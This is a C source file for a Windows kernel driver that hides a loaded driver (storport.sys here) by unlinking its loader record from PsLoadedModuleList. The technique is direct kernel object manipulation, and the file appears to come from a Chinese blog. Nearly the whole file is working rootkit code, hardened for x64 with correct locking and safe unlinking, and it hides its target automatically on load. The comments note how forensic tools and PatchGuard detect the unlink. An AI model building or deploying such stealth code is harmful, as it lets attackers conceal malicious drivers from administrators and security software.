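#include <ntddk.h>

/*
 * Module-hiding kernel driver sample: direct kernel object manipulation (DKOM)
 * of the loaded-module list.
 *
 * The kernel keeps one loader record per loaded image on a doubly linked list
 * (PsLoadedModuleList). Anything that enumerates drivers by walking that list
 * stops reporting an image once its record is unlinked. HideDriver() does that
 * for L"storport.sys", an arbitrary example target taken from the original
 * listing.
 *
 * Review notes for anyone reusing this:
 *  - It is a classic rootkit technique. Defensive tooling typically catches it
 *    by cross-checking this list against sources it does not cover (e.g. pool
 *    scanning for loader records, driver objects in the object manager
 *    namespace); assume the unlink itself is visible to a forensic examiner.
 *  - On 64-bit Windows, kernel patch protection (PatchGuard) is widely reported
 *    to validate this list, so expect a delayed CRITICAL_STRUCTURE_CORRUPTION
 *    bugcheck; driver signature enforcement also has to be dealt with before
 *    this driver can load at all.
 *  - KLDR_DATA_TABLE_ENTRY is undocumented and version dependent. Only the
 *    fields up to BaseDllName are touched here. NOTE(review): verify the layout
 *    against the target build's symbols before relying on anything past them.
 *  - The unlink is never undone: unloading this driver leaves the target
 *    hidden, and re-linking later would require the record to still be alive.
 */

/*
 * Partial layout of the kernel loader record (nt!_KLDR_DATA_TABLE_ENTRY), not
 * declared in the public WDK headers.
 *
 * NonPagedDebugInfo is a pointer in the real structure. The original listing
 * declared it as a 4-byte DWORD, which is only correct for 32-bit builds and
 * shifts every following field (including both name strings) on x64.
 */
typedef struct _KLDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;    /* links this record into PsLoadedModuleList */
    PVOID ExceptionTable;
    ULONG ExceptionTableSize;
    PVOID GpValue;
    PVOID NonPagedDebugInfo;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;     /* e.g. \SystemRoot\System32\drivers\storport.sys */
    UNICODE_STRING BaseDllName;     /* e.g. storport.sys -- the field compared below */
    ULONG Flags;
    USHORT LoadCount;
    USHORT Unused5;
    PVOID SectionPointer;
    ULONG CheckSum;
    PVOID LoadedImports;
    PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

/*
 * Exported by ntoskrnl but absent from ntddk.h. PsLoadedModuleList is the list
 * head itself (a LIST_ENTRY living in the kernel image, which is how debuggers
 * and memory-forensics tools treat the symbol; declaring it as PLIST_ENTRY
 * would make the first real record look like the head). PsLoadedModuleResource
 * is the ERESOURCE the kernel holds around every insertion into and removal
 * from that list.
 */
extern NTKERNELAPI LIST_ENTRY PsLoadedModuleList;
extern NTKERNELAPI ERESOURCE PsLoadedModuleResource;

/* Kept from the original listing. The unlink path no longer needs it (the
 * original used DriverSection as its starting point); it remains only so the
 * module-level state is unchanged. */
PDRIVER_OBJECT pDriverObject = NULL;

DRIVER_INITIALIZE DriverEntry;
DRIVER_UNLOAD UnloadDriver;

/*
 * Unlink the first loader record whose BaseDllName equals Name.
 *
 * The comparison is case-insensitive: image names are case-insensitive on
 * NTFS, and the case stored in the record is whatever the loader was given.
 * (The original compared case-sensitively and would miss e.g. STORPORT.SYS.)
 *
 * Must be called at PASSIVE_LEVEL. Takes PsLoadedModuleResource exclusively
 * for the duration of the walk and the unlink.
 *
 * Returns TRUE if a record was found and unlinked, FALSE if no record matched.
 */
static BOOLEAN
UnlinkLoadedModule(PCUNICODE_STRING Name)
{
    BOOLEAN unlinked = FALSE;
    PLIST_ENTRY head = &PsLoadedModuleList;
    PLIST_ENTRY link;

    PAGED_CODE();

    /*
     * The kernel edits this list on every driver load and unload under
     * PsLoadedModuleResource. Rewriting the links without holding it races
     * with a concurrent load/unload and can leave a neighbour pointing at
     * freed pool. ExAcquireResourceExclusiveLite requires APCs disabled,
     * hence the critical region.
     */
    KeEnterCriticalRegion();
    ExAcquireResourceExclusiveLite(&PsLoadedModuleResource, TRUE);

    /*
     * Start after the head and stop when we get back to it. The head is a bare
     * LIST_ENTRY, not a loader record, so reading a "BaseDllName" out of it
     * would read whatever kernel global happens to follow it. The original
     * walked the ring from its own DriverSection, which eventually reaches the
     * head and treats it as a record, and its loop condition also skipped the
     * last record before wrapping around.
     */
    for (link = head->Flink; link != head; link = link->Flink) {
        PKLDR_DATA_TABLE_ENTRY entry =
            CONTAINING_RECORD(link, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);

        /* Validate the field we actually compare. The original tested
         * FullDllName.Buffer and then compared BaseDllName. */
        if (entry->BaseDllName.Buffer == NULL || entry->BaseDllName.Length == 0) {
            continue;
        }
        if (RtlCompareUnicodeString(Name, &entry->BaseDllName, TRUE) != 0) {
            continue;
        }

        /* %wZ: a UNICODE_STRING buffer is not guaranteed to be NUL-terminated,
         * so %ws on Buffer could read past the end of it. */
        KdPrint(("隐藏驱动 %wZ 成功!\n", &entry->BaseDllName));

        /*
         * RemoveEntryList patches both neighbours with pointer-sized stores.
         * The original did this by hand through a DWORD* cast and a DWORD
         * conversion, which truncates Flink to 32 bits on x64 and corrupts
         * the neighbour's link.
         */
        RemoveEntryList(&entry->InLoadOrderLinks);

        /*
         * Point the detached record at itself. After RemoveEntryList the
         * neighbours no longer reference this record, but the record still
         * references them. If the hidden image is later unloaded, a
         * RemoveEntryList on this record would write through those stale
         * pointers into whatever now occupies that pool (or fast-fail on a
         * corrupt list). A self-linked entry makes that removal a harmless
         * no-op.
         */
        InitializeListHead(&entry->InLoadOrderLinks);

        unlinked = TRUE;
        break;
    }

    ExReleaseResourceLite(&PsLoadedModuleResource);
    KeLeaveCriticalRegion();

    return unlinked;
}

/*
 * Hide the hard-coded example target. Kept as the zero-argument entry point
 * the original exposed; the name it hides is the only thing specific to it.
 */
VOID
HideDriver(void)
{
    UNICODE_STRING target;

    RtlInitUnicodeString(&target, L"storport.sys");

    /* Report the miss instead of silently doing nothing. */
    if (!UnlinkLoadedModule(&target)) {
        KdPrint(("HideDriver: %wZ not found in PsLoadedModuleList\n", &target));
    }
}

/*
 * DriverUnload callback. It deliberately does not re-link the hidden record:
 * the record may already be gone if that image was unloaded in the meantime,
 * and re-inserting it would need the same lock discipline as the unlink.
 *
 * DriverUnload must be VOID; the original returned NTSTATUS, which does not
 * match PDRIVER_UNLOAD.
 */
VOID
UnloadDriver(
    IN PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);
}

/*
 * Driver entry point: registers the unload routine and hides the target
 * module immediately. DriverEntry runs at PASSIVE_LEVEL, which the unlink
 * path requires.
 */
NTSTATUS
DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
    UNREFERENCED_PARAMETER(RegistryPath);

    DriverObject->DriverUnload = UnloadDriver;
    pDriverObject = DriverObject;

    HideDriver();

    return STATUS_SUCCESS;
}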
Source: https://www.cnblogs.com/yifi/p/6474364.html